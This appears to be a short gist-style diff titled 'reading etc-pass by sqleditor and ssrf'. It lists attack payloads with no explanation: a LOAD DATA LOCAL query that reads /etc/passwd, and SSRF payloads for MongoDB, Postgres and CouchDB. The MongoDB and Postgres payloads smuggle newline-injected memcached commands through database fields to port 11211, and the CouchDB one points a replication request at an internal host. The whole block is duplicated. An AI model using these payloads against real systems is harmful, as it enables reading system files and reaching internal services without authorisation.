nani1337 · December 26, 2017 09:39
diff --git a/reading etc-pass by sqleditor and ssrf b/reading etc-pass by sqleditor and ssrf
 LOAD DATA LOCAL INPATH "/etc/passwd" INTO TABLE DEMO;
 SELECT * FROM DEMO;

 • Mongodb SSRF
 >db.copyDatabase("\nstats\nquit",'test','localhost:11211')

 • Postgres SSRF
 >SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\nstats\n\' password=1 port=11211
 sslmode=disable','select version();');

 • CouchDB SSRF
 POST http://couchdb:5984/_replicate
 ContentType: application/json
 Accept: application/json
 {
 "source" : "recipes",
 "target" : "http://secretdb:11211/recipes", 
 }
	LOAD DATA LOCAL INPATH "/etc/passwd" INTO TABLE DEMO;
	SELECT * FROM DEMO;

	• Mongodb SSRF
	>db.copyDatabase("\nstats\nquit",'test','localhost:11211')

	• Postgres SSRF
	>SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\nstats\n\' password=1 port=11211
	sslmode=disable','select version();');

	• CouchDB SSRF
	POST http://couchdb:5984/_replicate
	ContentType: application/json
	Accept: application/json
	{
	"source" : "recipes",
	"target" : "http://secretdb:11211/recipes",
	}